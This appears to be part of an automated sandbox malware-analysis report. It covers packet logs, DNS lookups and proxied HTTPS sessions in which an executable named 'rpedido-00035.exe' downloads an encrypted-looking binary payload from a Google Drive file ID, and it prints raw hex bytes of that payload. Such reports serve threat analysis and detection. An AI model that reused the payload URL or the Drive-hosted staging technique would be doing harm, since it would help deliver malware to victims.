                                                        Oct 4, 2024 17:25:18.769969940 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.770267963 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.770334959 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.770620108 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.772291899 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.772481918 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.772545099 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.772800922 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.774455070 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.774616957 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.774677992 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.774868965 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.776793957 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.777012110 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.777069092 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.777225018 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.779144049 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.779376030 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.779433966 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.779652119 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.781416893 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.781629086 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.781687021 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.781888962 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.783725977 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.783972979 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.784030914 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.784332037 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.786427975 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.786636114 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.786714077 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.786926985 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.788337946 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.788651943 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.788708925 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.788981915 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.790735006 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.790939093 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.791009903 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.791281939 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.792792082 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.793071032 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.793138981 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.793459892 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.795027018 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.795279980 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.796153069 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.796371937 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.796442986 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.796667099 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.798280954 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.798530102 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.798595905 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.798865080 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.800339937 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.800646067 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.800703049 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.800987005 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.802386045 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.802613974 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.802671909 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.802906990 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.804672003 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.804941893 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.805011034 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.805288076 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.806767941 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.806982040 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.807044983 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.807288885 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.808902979 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.809134007 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.809201956 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.809417009 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.810478926 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.810713053 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.810786963 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.810996056 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.812486887 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.812702894 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.812763929 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.812951088 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.814102888 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.814326048 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.814387083 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.814546108 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.814603090 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.814857960 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.816121101 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.816287994 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.816353083 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.816565037 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.817878008 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.818054914 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.818120956 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.818316936 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.819917917 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.820137978 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.820677996 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.820926905 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.820983887 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.821212053 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.822448969 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.822730064 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.822787046 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.823026896 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.824230909 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.824389935 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.824450016 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.824708939 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.825989008 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.826209068 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.826267004 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.826477051 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.827954054 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.828151941 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.828265905 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.828480959 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.829687119 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.829926968 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.829994917 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.830277920 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.831233025 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.831511021 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.831568003 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.831862926 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.832966089 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.833161116 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.833225012 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.833372116 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.834645033 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.834937096 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.834994078 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.835257053 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.836520910 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.836803913 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.836870909 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.837138891 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.838141918 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.838470936 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.838543892 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.838803053 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.839550972 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.839766026 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.839827061 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.840059042 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.841120958 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.841375113 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.841415882 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.841572046 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.842561960 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.842823029 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.842854023 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.843013048 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.844300032 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.844561100 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.845016003 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.845277071 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.845336914 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.845618963 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.846607924 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.846874952 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.846929073 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.847187996 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.848274946 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.848459959 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.848514080 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.848814011 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.849811077 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.850089073 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.850146055 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.850322962 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.851248026 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.851459980 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.851496935 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.851752043 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.852632999 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.852847099 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.852880001 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.853123903 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.854058981 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.854299068 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.854360104 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.854583979 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.855607986 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.855819941 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.855890989 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.856072903 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.856111050 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.856147051 CEST44349776142.250.65.161192.168.11.20
                                                        Oct 4, 2024 17:25:18.856360912 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.856434107 CEST49776443192.168.11.20142.250.65.161
                                                        Oct 4, 2024 17:25:18.856479883 CEST44349776142.250.65.161192.168.11.20

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 4, 2024 17:25:14.849893093 CEST5605353192.168.11.201.1.1.1
                                                        Oct 4, 2024 17:25:14.945609093 CEST53560531.1.1.1192.168.11.20
                                                        Oct 4, 2024 17:25:15.514143944 CEST5687953192.168.11.201.1.1.1
                                                        Oct 4, 2024 17:25:15.610479116 CEST53568791.1.1.1192.168.11.20

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Oct 4, 2024 17:25:14.849893093 CEST192.168.11.201.1.1.10x7407Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                        Oct 4, 2024 17:25:15.514143944 CEST192.168.11.201.1.1.10x2524Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Oct 4, 2024 17:25:14.945609093 CEST1.1.1.1192.168.11.200x7407No error (0)drive.google.com142.250.65.206A (IP address)IN (0x0001)false
                                                        Oct 4, 2024 17:25:15.610479116 CEST1.1.1.1192.168.11.200x2524No error (0)drive.usercontent.google.com142.250.65.161A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • drive.google.com
                                                        • drive.usercontent.google.com

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.11.2049775142.250.65.2064431532C:\Users\user\Desktop\rpedido-00035.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-04 15:25:15 UTC216OUTGET /uc?export=download&id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        2024-10-04 15:25:15 UTC1610INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 04 Oct 2024 15:25:15 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-CAaZdg_8-RjHYpVZNy3lfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.11.2049776142.250.65.1614431532C:\Users\user\Desktop\rpedido-00035.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-04 15:25:15 UTC258OUTGET /download?id=1SJyUxZ-IRKjDGK8OKILiTp3XunWvZ9IX&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        2024-10-04 15:25:18 UTC4896INHTTP/1.1 200 OK
                                                        Content-Type: application/octet-stream
                                                        Content-Security-Policy: sandbox
                                                        Content-Security-Policy: default-src 'none'
                                                        Content-Security-Policy: frame-ancestors 'none'
                                                        X-Content-Security-Policy: sandbox
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Cross-Origin-Embedder-Policy: require-corp
                                                        Cross-Origin-Resource-Policy: same-site
                                                        X-Content-Type-Options: nosniff
                                                        Content-Disposition: attachment; filename="vXWIcjgFX229.bin"
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: false
                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                        Accept-Ranges: bytes
                                                        Content-Length: 287808
                                                        Last-Modified: Fri, 04 Oct 2024 08:27:50 GMT
                                                        X-GUploader-UploadID: AD-8ljt05XRl21y2z0_2vshlLkvcVA0t1Qkk4SOoU0tREIECVoOiT1u5wevXZMYoaXRt6l350hVAUWIQ3Q
                                                        Date: Fri, 04 Oct 2024 15:25:18 GMT
                                                        Expires: Fri, 04 Oct 2024 15:25:18 GMT
                                                        Cache-Control: private, max-age=0
                                                        X-Goog-Hash: crc32c=gQatwQ==
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        2024-10-04 15:25:18 UTC4896INData Raw: 69 65 55 70 0b 38 8b cc f4 88 d2 79 0d 0b 74 5b 60 47 78 55 6f ef 45 02 d1 57 62 11 04 1a 9a e5 f1 cf 68 ea 2d e9 95 5e 18 69 ae 05 db 6e 8b 31 44 85 c5 ee c6 ed 59 6c 0e 29 17 2a 4b 69 a4 fe a3 bc e4 be e6 ab 2b 4e 12 0e cb 22 18 6b 32 e9 6f 13 d3 44 a4 ec 86 5d c3 8d 53 17 67 7c d1 18 bc b6 2b 3b 27 c4 aa df a2 0e 1c 04 cd a8 07 35 4c 75 1e f3 dd 49 f0 b4 c3 f8 25 d2 15 21 59 24 43 7c 31 eb 9c b4 6a e6 f3 ac 00 82 f9 65 d2 e5 cb df 7e cb ba b2 37 a8 bf 90 10 6e 33 fd 4c b6 0b 98 03 75 3b 90 fc ee 2b 2b 9f ad 31 fa 83 67 24 f2 23 b8 75 31 64 8a 48 ab 68 46 61 20 1f 4f b5 c1 ae 31 cb db d2 61 09 d9 fe 29 74 95 03 3a af b3 99 31 95 da d3 50 91 53 de d3 94 66 d2 e5 31 ea 79 86 88 00 25 b9 ec b8 c1 cc 5b d9 38 42 34 a2 15 7c cd 86 0c ac 0b 1e 3b 10 15 6f f4
                                                        Data Ascii: ieUp8yt[`GxUoEWbh-^in1DYl)*Ki+N"k2oD]Sg|+;'5LuI%!Y$C|1je~7n3Lu;++1g$#u1dHhFa O1a)t:1PSf1y%[8B4|;o
                                                        2024-10-04 15:25:18 UTC4896INData Raw: 60 22 4c c6 3d 16 e0 67 e3 ab 65 51 23 36 0f c5 45 ce d5 11 f3 3d 8d d6 db 1d 65 49 7d d8 aa 6a 13 40 a0 7d 6a 68 c7 55 ae 5c 44 96 28 25 d2 16 33 b3 cf 32 f4 07 44 a4 7a 22 84 6e be a7 c3 65 17 88 d1 38 dd 1f e8 cc 8a 1a fa 9a ee e0 15 5b 86 d0 c2 d3 ae e2 e3 55 84 5d 15 34 1f dd d8 db 47 b1 a8 93 dc 2c 05 aa 33 5f 8f 4b 28 ae ce b7 79 aa 90 db e1 12 68 21 d3 5b e5 9b f3 06 23 1a 0b 36 24 74 5e 0a df 0c 71 38 66 28 59 da ed 3a f0 69 6c a1 9c dd 24 67 19 2b c7 8a ce a6 47 ff 04 15 30 a5 78 3b 71 2d dc 0d 8a e3 95 e8 e8 73 f9 c4 cd b2 9b 8f 8d 54 03 66 5f db 2a f8 84 6f d8 89 d8 d8 30 71 c6 64 b0 a9 31 14 55 ee 99 d5 89 f7 00 b3 df 0e a7 bb 2f c3 ac 78 09 3c 01 00 04 dd b5 0d df ad 18 2c cd 99 d6 38 ad b3 15 42 9b 79 c1 1f 54 f7 9a f9 64 21 e4 29 06 52 91
                                                        Data Ascii: `"L=geQ#6E=eI}j@}jhU\D(%32Dz"ne8[U]4G,3_K(yh![#6$t^q8f(Y:il$g+G0x;q-sTf_*o0qd1U/x<,8ByTd!)R
                                                        2024-10-04 15:25:18 UTC12INData Raw: 8d 09 55 c9 b7 2a a2 31 4e c6 73 ff
                                                        Data Ascii: U*1Ns
                                                        2024-10-04 15:25:18 UTC1255INData Raw: 13 46 3e 5a fe 38 8e 00 b0 90 b9 33 2d d2 14 8a b4 08 47 7c 33 93 ac 5e bb 70 2b 50 da de 70 ab 0d 52 93 22 5a 87 89 6e 5f dd ab fc 77 b3 0f ab 8d 75 d3 e9 45 46 18 01 dc 5b 3c e8 bf 3c ee 68 46 6e a5 25 4e cc c0 2c e6 8a 32 c0 62 8d 9d aa da 49 7e 9b 71 7c 57 27 70 58 53 b7 72 4a 0f 72 ab 62 c7 5c 09 28 86 a7 9e 31 96 4d ce ae d0 a2 a4 55 4f cf f7 8c c5 73 1a ab 71 e2 6d a1 59 b0 d2 98 86 ea 00 ac e4 c7 d5 a8 3b c5 8c 51 35 4a 89 4d 3d 7a cf d0 68 9f 7f 9a c9 ba fd 46 52 b4 5f 39 4b 0f 2e 9f 14 cf 6b 1e f9 c8 e3 2a 70 8d d9 c8 f0 ef 6f 49 28 c0 34 39 a0 b7 a0 4c 55 40 42 ae b1 50 f2 7f 3d 76 f7 4f eb fd 15 e1 0a 13 d3 4a b9 25 f0 cd b1 17 d3 7d 89 ab bb 5b f4 b2 32 bb 4a e7 f2 e4 04 5c d9 22 5e f1 fa a5 ec 82 23 27 32 5a c7 dd 7e 86 62 8b 59 76 8a 2e a2
                                                        Data Ascii: F>Z83-G|3^p+PpR"Zn_wuEF[<<hFn%N,2bI~q|W'pXSrJrb\(1MUOsqmY;Q5JM=zhFR_9K.k*poI(49LU@BP=vOJ%}[2J\"^#'2Z~bYv.
                                                        2024-10-04 15:25:18 UTC66INData Raw: 8e 1f a2 57 e4 cc 69 e8 1c 51 b2 aa 1b a9 c6 7d 34 c1 b6 97 26 3d e3 43 4e 73 04 62 df 0f 34 3d 7d f6 e5 d1 4c ad 55 ef 27 5f 62 36 6f 6f 53 5d 7d cb dc eb 2e d2 f9 02 f7 0a d1 1d a7 6d a0 fd 66 bc
                                                        Data Ascii: WiQ}4&=CNsb4=}LU'_b6ooS]}.mf
